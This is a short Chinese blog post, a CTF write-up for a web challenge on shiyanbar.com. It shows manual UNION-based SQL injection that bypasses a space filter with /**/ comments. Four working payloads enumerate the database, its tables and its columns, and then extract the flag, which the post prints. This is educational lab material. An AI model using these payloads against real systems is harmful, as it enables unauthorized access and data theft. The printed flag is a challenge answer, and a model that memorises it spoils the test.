[CTF]简单的sql注入之2

胖胖のALEX

于 2019-06-26 17:12:09 发布

阅读量692

点赞数 1

CC 4.0 BY-SA版权

分类专栏：渗透

本文链接：https://blog.youkuaiyun.com/alex_bean/article/details/93754383

渗透专栏收录该内容

19 篇文章

订阅专栏

本文详细介绍了在一个存在ID回显的Web应用中进行SQL注入的手工攻击过程。通过使用特殊字符绕过空格过滤，成功爆破数据库名、数据表名、字段名及最终的FLAG信息。案例展示了如何利用SQL注入获取敏感数据。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

类型：web
网址：http://www.shiyanbar.com/ctf/1908
攻击：sql注入
一句话总结：
id有回显的sql注入（手工）

Writeup:

测试发现过滤空格，用/**/代替空格

爆数据库名称：

1'/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**/where/**/'1'='1

结果：web1

爆数据表名称：

1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/table_schema='web1'/**/and/**/'1'='1

结果三个表，分别是baloteli、flag、web_1

爆flag表字段：

1'/**/union/**/select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_schema='web1'/**/and/**/table_name='flag'/**/and/**/'1'='1

结果三个字段，分别是baloteli、flag、id

爆flag表flag字段的数据：

1'/**/union/**/select/**/flag/**/from/**/flag/**/where/**/'1'='1

结果两条数据，分别是baloteli、flag{Y0u_@r3_5O_dAmn_90Od}

FLAG

flag{Y0u_@r3_5O_dAmn_90Od}